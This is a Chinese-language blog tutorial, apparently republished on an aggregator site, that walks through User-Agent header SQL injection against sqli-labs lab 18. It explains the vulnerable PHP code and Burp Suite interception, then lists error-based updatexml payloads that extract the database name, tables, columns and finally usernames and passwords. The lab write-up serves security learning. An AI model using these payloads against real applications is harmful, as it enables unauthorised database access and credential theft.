IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> sql注入HTTP头部注入 -> 正文阅读

[网络协议]sql注入HTTP头部注入

HTTP头部注入

原理: 一般在通过获取头部的信息用于数据的分析,通过头部可以向数据库发送查询信息,所以构造恶意的语句结构就可以向数据库进行信息查询。本次HTTP头部注入实验将在sqlilabs靶场中的第十八题进行注入

  1. 此图片为sqlilabs靶场中第十八题中的php代码环境,从代码环境中,我们可以分析到对于Post注入方式,还是通过魔术引号的方式进行了防护,但是在红框中的代码却露出了马脚

$ uagent = $_SERVER [‘HTTP_USER_AGENT’];
$ IP = $_SERVER [‘REMOTE_ADDR’];

  • 这两段代码中 $_SERVER是PHP中预定义变量符,可以获取头部信息,路径信息,IP信息。PHP文件中表示获取头部信息与当前主机ip信息
  • 本题中注入的点应该是围绕着$ uagent头部信息进行注入。
数组元素说明信息
$_SERVER[‘SERVER_NAME’]当前运行脚本所在服务器的主机名。
$_SERVER[‘SERVER_PROTOCOL’]请求页面时通信协议的名称和版本。例如:HTTP/1.0
$_SERVER[‘SERVER_ADDR’]当前运行脚本所在服务器的 IP 地址
$_SERVER[‘REQUEST_METHOD’]访问页面使用的请求方法。例如“GET”“HEAD”“POST”“PUT”
$_SERVER[‘REMOVE_ADDR’]浏览当前页面的用户 IP 地址,注意与 $_SERVER[‘SERVER_ADDR’] 的区别
$_SERVER[‘SCRIPT_FILENAME’]当前执行脚本的绝对路径
$_SERVER[‘SCRIPT_NAME’]包含当前脚本的路径
$_SERVER[‘REQUEST_URI’]URI 用来指定要访问的页面。例如,“index.html”
$_SERVER[‘DOCUMENT_ROOT’]当前运行脚本所在的文档根目录。在服务器配置文件中定义

在这里插入图片描述
3. 我们已经知道了http头部注入,从头部的内容拿到insert基于报错注入。

  • insert语句:insert是在mysql数据库中作为放入字段数据的执行指令。

insert into member(username,pw,sex,phonenum,email,address) values(‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,‘xx’,)

  • 所以我们构造payload基于函数的报错注入。

updatexml() : MYSQL对xml文档数据进行查询和修改的XPATH函数
updatexml(xml_document,XPathstring,new_value) :表名,路径(路径错误会报错),替换的值
extractvalue() :MYSQL对xml文档数据进行查询XPATH函数
floor() :MYSQL中用来取整的函数

  1. 我们使用burpsuite对第十八题进行抓包分析
  • 打开burpsuite的Intercept is on开关
    在这里插入图片描述
  • 对十八题靶场中随便输入账户密码进行包的抓取
    在这里插入图片描述
  • 右击保存在Repeater中进行编辑
    在这里插入图片描述
    在这里插入图片描述
  1. 通过在User-Agent字段后面添加单引号查看是否有报错来判断是否存在注入点
  • 如下图所示,在User-Agent后面添加后出现了报错,存在HTTP头部注入
    在这里插入图片描述
  1. 通过报错注入发现数据库信息
  • 使用payload构造,使用报错函数updatexml其中0X7e表示的是 ~ 这个符号 ,concat函数用于将两个字段拼接

’ or updatexml(1,concat(0x7e,(database())),1) ,’’,’’)#
’ or updatexml(1,concat(0x7e,(datebase())),1) or ‘1’='1
在这里插入图片描述

  1. 通过database()参数位置进行更改,查询到数据库下的所有表信息

’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),1) ,’’,’’)#
在这里插入图片描述

  1. 通过上一步中找到的所以表的信息,我们可以继续查询表下面所对应的字段名称

’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)),1) ,’’,’’)#
在这里插入图片描述

  1. 查询到了字段名称,也就相当于表中的数据我们也是可以手到擒来了

’ or updatexml(1,concat(0x7e,(select group_concat(username,password1) from users)),1) ,’’,’’)#

在这里插入图片描述

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2021-11-15 16:11:28  更:2021-11-15 16:12:09 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年7日历 -2024/7/3 21:44:46-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码